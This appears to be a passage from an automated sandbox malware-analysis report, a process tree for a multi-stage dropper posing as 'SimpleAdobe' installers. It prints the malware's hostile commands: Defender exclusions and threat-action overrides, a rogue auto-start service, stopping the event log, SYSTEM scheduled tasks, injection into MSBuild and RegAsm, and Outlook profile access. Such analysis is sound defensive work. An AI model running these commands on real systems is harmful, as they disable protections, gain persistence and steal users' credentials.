PID 5020 wrote to memory of 1820	5020	mibSk5BFjCa4UGEw0tal2yQC.exe	MSBuild.exe
PID 5020 wrote to memory of 1820	5020	mibSk5BFjCa4UGEw0tal2yQC.exe	MSBuild.exe
PID 5020 wrote to memory of 1820	5020	mibSk5BFjCa4UGEw0tal2yQC.exe	MSBuild.exe
PID 5020 wrote to memory of 1820	5020	mibSk5BFjCa4UGEw0tal2yQC.exe	MSBuild.exe
PID 5020 wrote to memory of 1820	5020	mibSk5BFjCa4UGEw0tal2yQC.exe	MSBuild.exe
PID 5020 wrote to memory of 1820	5020	mibSk5BFjCa4UGEw0tal2yQC.exe	MSBuild.exe
PID 5020 wrote to memory of 1820	5020	mibSk5BFjCa4UGEw0tal2yQC.exe	MSBuild.exe
PID 5020 wrote to memory of 1820	5020	mibSk5BFjCa4UGEw0tal2yQC.exe	MSBuild.exe
PID 1012 wrote to memory of 4972	1012	SWKM3BZCcIHViuMlWB_ItJtR.exe	schtasks.exe
PID 1012 wrote to memory of 4972	1012	SWKM3BZCcIHViuMlWB_ItJtR.exe	schtasks.exe
PID 1012 wrote to memory of 4972	1012	SWKM3BZCcIHViuMlWB_ItJtR.exe	schtasks.exe
PID 1708 wrote to memory of 4868	1708	eb8oCAqj4BdwdiLJp_sYHpSG.tmp	vkfreeaudiosaver32_64.exe

outlook_office_path 1 IoCs

Processes:

RegAsm.exe

description ioc process

Key opened \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

outlook_win_path 1 IoCs

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\archive\setup.exe
"C:\Users\Admin\AppData\Local\Temp\archive\setup.exe"
1⤵
- Modifies firewall policy service
- Checks computer location settings
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2972

C:\Users\Admin\Documents\SimpleAdobe\PuMRANaFeo3cGudQytaFcnzh.exe
C:\Users\Admin\Documents\SimpleAdobe\PuMRANaFeo3cGudQytaFcnzh.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4272

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
3⤵
- Power Settings
PID:4184

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
3⤵
- Power Settings
PID:3724

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
3⤵
- Power Settings
PID:2516

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
3⤵
- Power Settings
PID:3672

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:2188

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "CIFUBVHI"
3⤵
- Launches sc.exe
PID:1648

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "CIFUBVHI" binpath= "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe" start= "auto"
3⤵
- Launches sc.exe
PID:4572

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
3⤵
- Launches sc.exe
PID:2340

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "CIFUBVHI"
3⤵
- Launches sc.exe
PID:4400

C:\Users\Admin\Documents\SimpleAdobe\S8foXdS7HYSMtBrHz1ZrPeP5.exe
C:\Users\Admin\Documents\SimpleAdobe\S8foXdS7HYSMtBrHz1ZrPeP5.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1496

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\IDAAFBGDBK.exe"
3⤵
PID:2188

C:\Users\Admin\AppData\Local\Temp\IDAAFBGDBK.exe
"C:\Users\Admin\AppData\Local\Temp\IDAAFBGDBK.exe"
4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:2200

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
"C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe"
5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3412

C:\Users\Admin\AppData\Local\Temp\1000006001\9eaefd5738.exe
"C:\Users\Admin\AppData\Local\Temp\1000006001\9eaefd5738.exe"
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:3628

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\JJDGIIDHJE.exe"
3⤵
- Checks computer location settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2412

C:\Users\Admin\Documents\SimpleAdobe\q7psGQ3aiTk_B1mfefLThniX.exe
C:\Users\Admin\Documents\SimpleAdobe\q7psGQ3aiTk_B1mfefLThniX.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
3⤵
PID:3692

C:\Users\Admin\AppData\Local\Temp\RarSFX0\polaris.exe
polaris.exe -priverdD
4⤵
- Checks computer location settings
- Executes dropped EXE
PID:4616

C:\Users\Admin\AppData\Local\Temp\RarSFX1\pokafdw.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\pokafdw.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3656

C:\Users\Admin\Documents\SimpleAdobe\eb8oCAqj4BdwdiLJp_sYHpSG.exe
C:\Users\Admin\Documents\SimpleAdobe\eb8oCAqj4BdwdiLJp_sYHpSG.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2336

C:\Users\Admin\AppData\Local\Temp\is-E7QAH.tmp\eb8oCAqj4BdwdiLJp_sYHpSG.tmp
"C:\Users\Admin\AppData\Local\Temp\is-E7QAH.tmp\eb8oCAqj4BdwdiLJp_sYHpSG.tmp" /SL5="$801C4,5154567,54272,C:\Users\Admin\Documents\SimpleAdobe\eb8oCAqj4BdwdiLJp_sYHpSG.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1708

C:\Users\Admin\AppData\Local\VK Free Audio Saver\vkfreeaudiosaver32_64.exe
"C:\Users\Admin\AppData\Local\VK Free Audio Saver\vkfreeaudiosaver32_64.exe" -i
4⤵
- Executes dropped EXE
PID:4876

C:\Users\Admin\AppData\Local\VK Free Audio Saver\vkfreeaudiosaver32_64.exe
"C:\Users\Admin\AppData\Local\VK Free Audio Saver\vkfreeaudiosaver32_64.exe" -s
4⤵
- Executes dropped EXE
PID:4868

C:\Users\Admin\Documents\SimpleAdobe\NJwFp4moOVCLFNHiDa5bIGzw.exe
C:\Users\Admin\Documents\SimpleAdobe\NJwFp4moOVCLFNHiDa5bIGzw.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3820

C:\Users\Admin\AppData\Local\Temp\7zS7ED0.tmp\Install.exe
.\Install.exe
3⤵
- Executes dropped EXE
PID:2088

C:\Users\Admin\AppData\Local\Temp\7zS8C5D.tmp\Install.exe
.\Install.exe /vtdidfAT "525403" /S
4⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
PID:2012

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
5⤵
PID:4916

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
6⤵
PID:1604

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2076

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:652

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bUVDAOPnPkUhchiViu" /SC once /ST 19:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS8C5D.tmp\Install.exe\" q7 /rYNdiddt 525403 /S" /V1 /F
5⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:4904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2012 -s 652
5⤵
- Program crash
PID:3212

C:\Users\Admin\Documents\SimpleAdobe\6J_fcmCVLn9KieKbpsZvL30J.exe
C:\Users\Admin\Documents\SimpleAdobe\6J_fcmCVLn9KieKbpsZvL30J.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4656

C:\Users\Admin\AppData\Local\Temp\7zS7F2E.tmp\Install.exe
.\Install.exe
3⤵
- Executes dropped EXE
PID:4620

C:\Users\Admin\AppData\Local\Temp\7zS8930.tmp\Install.exe
.\Install.exe /FdidQOvZ "385137" /S
4⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
PID:4672

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
5⤵
PID:380

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
6⤵
PID:4436

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3484

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3508

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bBfKaGDnIKdTdJZScE" /SC once /ST 19:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS8930.tmp\Install.exe\" pa /SadidQi 385137 /S" /V1 /F
5⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4672 -s 1140
5⤵
- Program crash
PID:8

C:\Users\Admin\Documents\SimpleAdobe\3x7B5KMTGyQ8p8HaByXtiLCL.exe
C:\Users\Admin\Documents\SimpleAdobe\3x7B5KMTGyQ8p8HaByXtiLCL.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2200

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2512

C:\Users\Admin\Documents\SimpleAdobe\mibSk5BFjCa4UGEw0tal2yQC.exe
C:\Users\Admin\Documents\SimpleAdobe\mibSk5BFjCa4UGEw0tal2yQC.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5020

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
3⤵
PID:3032

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1820

C:\Users\Admin\Documents\SimpleAdobe\SWKM3BZCcIHViuMlWB_ItJtR.exe
C:\Users\Admin\Documents\SimpleAdobe\SWKM3BZCcIHViuMlWB_ItJtR.exe
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1012

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:4972

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:956

C:\Users\Admin\Documents\SimpleAdobe\GsSlVKj1HY8eSYR0r_a6kCV6.exe
C:\Users\Admin\Documents\SimpleAdobe\GsSlVKj1HY8eSYR0r_a6kCV6.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1528

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
3⤵
PID:2656

C:\Users\Admin\Documents\SimpleAdobe\3VugNwJeQs8ly7yqDYO4mKWh.exe
C:\Users\Admin\Documents\SimpleAdobe\3VugNwJeQs8ly7yqDYO4mKWh.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4568

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
3⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3584

C:\ProgramData\CAFBGHIDBG.exe
"C:\ProgramData\CAFBGHIDBG.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4896

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
- Checks computer location settings
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- outlook_office_path
- outlook_win_path
PID:5052

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea HR" /sc HOURLY /rl HIGHEST
6⤵
- Scheduled Task/Job: Scheduled Task
PID:3756

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea LG" /sc ONLOGON /rl HIGHEST
6⤵
- Scheduled Task/Job: Scheduled Task
PID:4116

C:\Users\Admin\AppData\Local\Temp\spanoLlWuGpBt9XU\wFKORKUUomDpdfJYw8c2.exe
"C:\Users\Admin\AppData\Local\Temp\spanoLlWuGpBt9XU\wFKORKUUomDpdfJYw8c2.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:456

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
7⤵
PID:948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 456 -s 280
7⤵
- Program crash
PID:3036

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8 HR" /sc HOURLY /rl HIGHEST
6⤵
- Scheduled Task/Job: Scheduled Task
PID:4400

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8 LG" /sc ONLOGON /rl HIGHEST
6⤵
- Scheduled Task/Job: Scheduled Task
PID:3108

C:\Users\Admin\AppData\Local\Temp\spanoLlWuGpBt9XU\rxYWvuYz0iK83W5tIP0y.exe
"C:\Users\Admin\AppData\Local\Temp\spanoLlWuGpBt9XU\rxYWvuYz0iK83W5tIP0y.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:652

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
7⤵
PID:4212

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
7⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 652 -s 296
7⤵
- Program crash
PID:636

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a HR" /sc HOURLY /rl HIGHEST
6⤵
- Scheduled Task/Job: Scheduled Task
PID:2736

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a LG" /sc ONLOGON /rl HIGHEST
6⤵
- Scheduled Task/Job: Scheduled Task
PID:2692

C:\Users\Admin\AppData\Local\Temp\spanoLlWuGpBt9XU\ZuSySbAJBbxTdwKngmmZ.exe
"C:\Users\Admin\AppData\Local\Temp\spanoLlWuGpBt9XU\ZuSySbAJBbxTdwKngmmZ.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:968

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
7⤵
PID:4556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 968 -s 328
7⤵
- Program crash
PID:1064

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915 HR" /sc HOURLY /rl HIGHEST
6⤵
- Scheduled Task/Job: Scheduled Task
PID:1648

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915 LG" /sc ONLOGON /rl HIGHEST
6⤵
- Scheduled Task/Job: Scheduled Task
PID:1652

C:\Users\Admin\AppData\Local\Temp\spanoLlWuGpBt9XU\QodMliwi0wNIw5fk4qWX.exe
"C:\Users\Admin\AppData\Local\Temp\spanoLlWuGpBt9XU\QodMliwi0wNIw5fk4qWX.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1960

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
7⤵
PID:2352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 280
7⤵
- Program crash
PID:736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 300
5⤵
- Program crash
PID:2280

C:\ProgramData\FCFBAKJDBK.exe
"C:\ProgramData\FCFBAKJDBK.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4444

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:1564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4444 -s 300
5⤵
- Program crash
PID:4980

C:\ProgramData\HIDHDAAEHI.exe
"C:\ProgramData\HIDHDAAEHI.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1268

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:3488

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:3872

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 324
5⤵
- Program crash
PID:4636

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJKFBFIJJECG" & exit
4⤵
PID:2636

C:\Windows\SysWOW64\timeout.exe
timeout /t 10
5⤵
- Delays execution with timeout.exe
PID:3940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:1836

C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4316

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
- Power Settings
PID:4948

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
- Power Settings
PID:924

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
- Power Settings
PID:456

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
- Power Settings
PID:3196

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:4516

C:\Windows\system32\svchost.exe
svchost.exe
2⤵
PID:1372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 4896 -ip 4896
1⤵
PID:2340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1268 -ip 1268
1⤵
PID:4736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1960 -ip 1960
1⤵
PID:3288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 652 -ip 652
1⤵
PID:4184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 456 -ip 456
1⤵
PID:1752

C:\Users\Admin\AppData\Local\Temp\7zS8C5D.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS8C5D.tmp\Install.exe q7 /rYNdiddt 525403 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3688

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 